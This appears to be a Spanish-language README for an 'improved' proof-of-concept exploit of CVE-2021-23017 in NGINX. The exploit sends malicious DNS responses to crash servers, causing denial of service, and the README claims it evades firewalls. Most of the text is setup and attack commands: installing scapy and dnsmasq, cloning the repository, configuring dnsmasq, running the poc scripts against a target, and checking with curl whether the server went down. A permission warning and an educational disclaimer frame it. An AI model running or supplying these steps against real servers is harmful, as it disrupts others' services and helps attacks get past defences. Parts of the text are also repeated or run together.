
vulnerabilidad en servidores NGINX (versiones 0.6.18–1.20.0). Los scripts buscan causar una Denegación de Servicio (DoS) enviando respuestas DNS maliciosas, con mejoras para evadir firewalls.
vulnerabilidad en servidores NGINX (versiones 0.6.18–1.20.0). Los scripts tienen como objetivo causar una Denegación de Servicio (DoS) mediante el envío de respuestas DNS maliciosas, con mejoras para evadir firewalls. Esta es una versión mejorada del PoC original de M507/CVE-2021-23017-PoC.
Advertencia: Use solo con permiso explícito por escrito del propietario del sistema. Las pruebas no autorizadas son ilegales.
sudo apt-get update
sudo apt-get install python3-scapy dnsmasq
pip3 install scapy requests
git clone https://github.com/6lj/EVIL-CVE-2021-23017-Update-2025.git
cd EVIL-CVE-2021-23017-Update-2025
dnsmasq:
sudo nano /etc/dnsmasq.conf
address=/test.example.com/192.168.1.100
sudo systemctl start dnsmasq
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.test.com) para bloquear el servidor NGINX.curl y dig para explotar la vulnerabilidad.En comparación con M507/CVE-2021-23017-PoC:
poc1.2.3.py para sniffing simultáneo, envío de DNS y disparo de consultas, debes ejecutar los tres juntos.Ejecuta los tres juntos y ejecuta con los argumentos apropiados (reemplaza <target_ip>, <your_dns_server_ip>, <target_url>).
poc.pypython3 poc.py --dns_server <your_dns_server_ip> --iface eth0 --count 50 --target_url http://<target_url>
poc2.pypython3 poc2.py --target <target_ip> --dns_server <your_dns_server_ip> --iface eth0 --count 50 --target_url http://<target_url>
poc3.py (Recomendado)python3 poc3.py --target <target_ip> --dns_server <your_dns_server_ip> --iface eth0 --target_url http://<target_url>
python3 poc3.py --target 192.168.1.100 --dns_server 192.168.1.101 --iface eth0 --target_url http://192.168.1.100
Comprueba el estado del servidor:
curl -I http://<target_url>
502 Bad Gateway o 503 Service Unavailable indica un bloqueo del servidor.200 OK sugiere que no hay vulnerabilidad o que el firewall está bloqueando.Monitorea el tráfico DNS:
sudo wireshark -f "udp port 53"
Descargo de responsabilidad: Solo con fines educativos. Los autores no son responsables del mal uso.